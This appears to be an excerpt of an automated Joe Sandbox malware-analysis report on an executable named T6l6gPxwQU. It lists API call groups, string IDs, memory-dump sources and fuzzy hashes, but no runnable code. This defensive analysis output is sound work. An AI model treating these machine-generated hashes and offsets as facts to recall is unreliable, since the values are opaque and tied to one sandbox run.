                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                        • Instruction ID: 5d65ea037ef6226b58c768f836262ab5344a2aa4d21a990fc390d7befde58963
                                                                        • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                        • Instruction Fuzzy Hash: E7110C62906A408AE748CF39EC481593BB2FB9CB09B589038C349CF275EE39949AC711
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                        • Instruction ID: 8eb0d2b0c6f93f81734420283d261018e9acf44a3150fa0a86b49ab5d428b8cc
                                                                        • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                        • Instruction Fuzzy Hash: F4018F32A54B4283EB109B2AF804A697361FF8DB99F445034CA4A46B24DF3CD1488B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                        • String ID:
                                                                        • API String ID: 179993514-0
                                                                        • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                        • Instruction ID: e9fe21153f9b7accdc5839c782fa2f0567c8b15d51dc102f512abbc7221bbaee
                                                                        • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                        • Instruction Fuzzy Hash: 50F04F21F1875283FB505B7AF848A696396BF8C749FC45434DA0E82B64DE3CD5898B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                        • String ID:
                                                                        • API String ID: 146765662-0
                                                                        • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                        • Instruction ID: da2f94be2a2d827c10d746c8d901cee28f8c219bc46e5d06c033438f7ff0eb4e
                                                                        • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                        • Instruction Fuzzy Hash: 36F05065A55A42C2EB04EF7AF8540696361FF8CFA9B545131CE2E86374DE3CD4999300
                                                                        APIs
                                                                        • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF6BB1BBF47), ref: 00007FF6BB1BCE29
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharLower
                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                        • API String ID: 2358735015-567219261
                                                                        • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                        • Instruction ID: fa92a46b36ea95d397a49f02cfeea603cc9506520f6d8fbd21e8e76e9ac633fe
                                                                        • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                        • Instruction Fuzzy Hash: E291BF23B19A5782EA788F2EC8405B927A1BB1C798B504531DF6DD37A4DF7DE952C300
                                                                        APIs
                                                                        • GetForegroundWindow.USER32 ref: 00007FF6BB190EDB
                                                                          • Part of subcall function 00007FF6BB190B90: CharUpperBuffW.USER32(?,?,00000001,00007FF6BB190F61), ref: 00007FF6BB190C6A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharForegroundUpperWindow
                                                                        • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                        • API String ID: 3570115564-1994484594
                                                                        • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                        • Instruction ID: fd1b4fd5b0ae4c638a85009c193929cea9b17c036eeac225f96b1bc76cb76c36
                                                                        • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                        • Instruction Fuzzy Hash: 4671B312F0968395FA649B6DD8012B962A1BF5D78CF844031CB8DC62B6EE7DE586C300
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                        • API String ID: 3964851224-769500911
                                                                        • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                        • Instruction ID: de98899def84abc5bd70023e54bc02725ae6bf89bd1fe705b0a3087f99373b90
                                                                        • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                        • Instruction Fuzzy Hash: DF41C522F19A9341EAA44F2D9845179A3D1BB6CBDCB540631CB9DC37A9EE3DE943C310
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID: #$E$O
                                                                        • API String ID: 3215553584-248080428
                                                                        • Opcode ID: 475178099990ac0353bf962476b95ad540ed5abada18ffefe6575b5c91291a80
                                                                        • Instruction ID: 1df3bcf89b18e57d620afa38012bc13b60dc78ce07a52d6502a895d844fb87bd
                                                                        • Opcode Fuzzy Hash: 475178099990ac0353bf962476b95ad540ed5abada18ffefe6575b5c91291a80
                                                                        • Instruction Fuzzy Hash: 74416A22A19B5185EF518F2998406BE23B4BF58B8CF184031EF5E87BA9DF3CE441C709
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                        • String ID: \*.*
                                                                        • API String ID: 3196045410-1173974218
                                                                        • Opcode ID: 3d99fb60beaa909b16133a9bcb21b6d4d5eca463ec33ffbc4784a3084b69c118
                                                                        • Instruction ID: 4956f88d4c4701cc27f6158dfa5752ba7d8a88171086d5f6316729e2d8a9dd04
                                                                        • Opcode Fuzzy Hash: 3d99fb60beaa909b16133a9bcb21b6d4d5eca463ec33ffbc4784a3084b69c118
                                                                        • Instruction Fuzzy Hash: 83414822A1869395EB20DB28D8401FD2760FF5D78CF844135DB8DD3AAAEF28E506C750
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClassName
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 787153527-1403004172
                                                                        • Opcode ID: 293fbebcd6f91a989341ff2a11dfce78c49a2189f57ef22a3f2ef9c0d82947c8
                                                                        • Instruction ID: 979c245e53f6993cd11c54f0fd5c1f37fd921fdb57a9dceaa7cd79f608c322cd
                                                                        • Opcode Fuzzy Hash: 293fbebcd6f91a989341ff2a11dfce78c49a2189f57ef22a3f2ef9c0d82947c8
                                                                        • Instruction Fuzzy Hash: EF319322B0974286FA24DB19E8511BA6360FF8DB98F544531DB9DC77B6CE3CE606CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 3113390036-3916222277
                                                                        • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                        • Instruction ID: 926cf0676a5cee45aa73de7dcb068b2ca7e13d5313f85cee63e4c65f7506801d
                                                                        • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                        • Instruction Fuzzy Hash: 1A31C622A1CB4286FB60DF29A450AAE6750FB8CB88F545131EF5D97B75DE3CE4068F00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                        • String ID: SysAnimate32
                                                                        • API String ID: 4146253029-1011021900
                                                                        • Opcode ID: 6e660b33d6e4a84e6fd34bbeb61245ead5be6ef8b5cba7022a4468a5647c8c45
                                                                        • Instruction ID: 30b78e2995bb2578063676e3dcd7c2ec225683282f7370ada935fecc689fe93a
                                                                        • Opcode Fuzzy Hash: 6e660b33d6e4a84e6fd34bbeb61245ead5be6ef8b5cba7022a4468a5647c8c45
                                                                        • Instruction Fuzzy Hash: EA316F72A097C1CAE7608F28E44476A33A0FB89795F54413ADB5D87BA4DF3CD844CB00
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 4061214504-1276376045
                                                                        • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                        • Instruction ID: 0582923bdfa2099bb14d08110f945295dc9a92ba84432f74cfd9c0486807707f
                                                                        • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                        • Instruction Fuzzy Hash: C6F03C21A2AA4281EE449B19F49427923A0FF8CBD9F981035EB0F86674DE3CD488CB00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                        • Instruction ID: 1e6d3a06245f4cf3f1e36e9f9102e1249af9c9038496ccc448848847d73a8383
                                                                        • Opcode Fuzzy Hash: 03f3b3863cf3428f55316b0c9d809bb68f76fa44e49f8ab79cf537312fbddc30
                                                                        • Instruction Fuzzy Hash: F4A1D172B0978286EB208F6994103B96691BF48BACF584636DF6EC67E5DF7CE4448310
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                        • Instruction ID: a9d5416ac47f95e60c8746ed9a3b977567370c65f0bd371f39816916775ee75b
                                                                        • Opcode Fuzzy Hash: f29f2ab1c13e66daf1f8c2b4a146e68bdfc50a5cc3b930cf9745f903616afb6d
                                                                        • Instruction Fuzzy Hash: 3A818B23E2861285F720DB2998806BD27A1BB4DB9CF444136DB0E97AF5CF38E446C718
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 3740051246-0
                                                                        • Opcode ID: 298953672724a5207909a795614b2829bd7d7b99ba66be59e73fbf309c8ee550
                                                                        • Instruction ID: c0deb194bfa746b26631146208eef97671bbc6e7f6b3f8521f595b085032debb
                                                                        • Opcode Fuzzy Hash: 298953672724a5207909a795614b2829bd7d7b99ba66be59e73fbf309c8ee550
                                                                        • Instruction Fuzzy Hash: 08617C62A08A8685EB10DF69E4943BD7B60FB89788F414132EB4D87AB6CF7CD545CB40
                                                                        APIs
                                                                        • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB1BC2BF), ref: 00007FF6BB1BD176
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB1BC2BF), ref: 00007FF6BB1BD217
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB1BC2BF), ref: 00007FF6BB1BD236
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB1BC2BF), ref: 00007FF6BB1BD281
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6BB1BC2BF), ref: 00007FF6BB1BD2A0
                                                                          • Part of subcall function 00007FF6BB144120: WideCharToMultiByte.KERNEL32 ref: 00007FF6BB144160
                                                                          • Part of subcall function 00007FF6BB144120: WideCharToMultiByte.KERNEL32 ref: 00007FF6BB14419C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                        • String ID:
                                                                        • API String ID: 666041331-0
                                                                        • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                        • Instruction ID: b5e41171e8d61d773389f4724d4deb7ac65c57402bde5953f8f10606a13ceac0
                                                                        • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                        • Instruction Fuzzy Hash: 45511436A14B5695EB14DB6AE8901AC73B4FB8DF88B464036DF4E873A6DF38E541C300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                        • Instruction ID: e0675a01f00ed6b5f7a10a09fd7aa9305a244c06ac256ed4be8fec0df945ab71
                                                                        • Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
                                                                        • Instruction Fuzzy Hash: D5519132A18B8285EB608F29A44017977A5FF48BA8F194235DF6E87AF4DE7CE441C740
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
